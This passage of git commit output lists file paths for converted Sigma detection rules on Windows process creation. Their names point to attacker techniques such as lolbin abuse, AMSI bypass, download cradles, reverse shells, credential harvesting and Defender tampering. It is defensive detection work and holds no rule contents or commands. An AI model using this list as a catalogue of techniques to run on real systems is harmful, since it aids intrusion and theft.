tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_customshellhost.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_defaultpack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml 
create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_diantz_ads.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_dnx.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_dotnet.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_dotnet_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_dump64.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_extexport.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_extrac32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_extrac32_ads.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_format.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_ftp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_gather_network_info.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_gpscript.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_ie4uinit.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_ilasm.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_jsc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_kavremover.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_manage_bde.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_mpiexec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_msdeploy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_openconsole.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_openwith.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_pcalua.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_pcwrun.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_pcwutl.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_pester.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_pester_1.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_printbrm.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_pubprn.yml 
create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_register_app.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_remote.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_replace.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_runexehelper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_runscripthelper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_scriptrunner.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_setres.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_settingsynchost.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_sftp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_sigverif.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_ssh.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_susp_atbroker.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_susp_dxcap.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_susp_grpconv.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_tracker.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_ttdinject.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_type.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_unregmp2.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_utilityfunctions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_wfc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_wlrmdr.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_workflow_compiler.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolscript_register_app.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lsass_process_clone.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_malware_conti_shadowcopy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_malware_script_dropper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mftrace_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mmc_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mofcomp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msbuild_susp_parent_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msdt_susp_cab_options.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msdt_susp_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msedge_proxy_download.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mshta_http.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mshta_inline_vbscript.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mshta_javascript.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mshta_lethalhta_technique.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mshta_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mshta_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mshta_susp_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msiexec_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msiexec_embedding.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msiexec_execute_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msiexec_install_quiet.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msiexec_install_remote.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msiexec_masquerading.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msiexec_web_install.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msohtmed_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mspub_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msra_process_injection.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mssql_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mstsc_remote_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msxsl_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_msxsl_remote_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_default_accounts_manipulation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_network_connections_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_share_and_sessions_enum.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_share_unmount.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_start_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_stop_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_use_mount_admin_share.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_use_mount_internet_share.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_use_mount_share.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_use_password_plaintext.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_user_add.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_net_user_add_never_expire.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_fw_add_rule.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_fw_delete_rule.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_fw_disable.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_fw_set_rule.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_packet_capture.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_port_forwarding.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_nltest_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_nltest_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_node_abuse.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_nslookup_domain_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_nslookup_poweshell_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ntdsutil_susp_usage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ntdsutil_usage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_odbcconf_driver_install.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml create mode 
100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_odbcconf_response_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_odbcconf_response_file_susp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_arbitrary_cli_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_office_winword_dll_load.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pdqdeploy_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_perl_inline_command_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_php_inline_command_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ping_hex_ip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pktmon_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_plink_port_forwarding.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_plink_susp_tunneling.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powercfg_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_add_windows_capability.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_audio_capture.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_base64_frombase64string.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_base64_iex.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_base64_invoke.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_base64_mppreference.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_cl_invocation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_cl_loadassembly.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_create_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_decode_gzip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_decrypt_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_defender_disable_feature.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_defender_exclusion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_disable_firewall.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_disable_ie_features.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_dll_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_downgrade_attack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_download_com_cradles.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_download_cradles.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_download_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_download_iex.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_download_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_email_exfil.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_encode.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_encoded_obfusc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_encoding_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_exec_data_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_export_certificate.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_frombase64string.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_frombase64string_archive.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_get_clipboard.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_getprocess_lsass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_iex_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_invocation_specific.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_mailboxexport_share.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_non_interactive_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_public_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_run_script_from_ads.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_sam_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_script_engine_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_set_acl.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_set_service_disabled.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_snapins_hafnium.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_stop_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_susp_download_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_susp_parent_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml create mode 
100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_token_obfuscation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_webclient_casing.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_x509enrollment.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_xor_commandline.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_powershell_zip_compress.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_presentationhost_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_print_remote_file_copy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_protocolhandler_download.yml create mode 100644 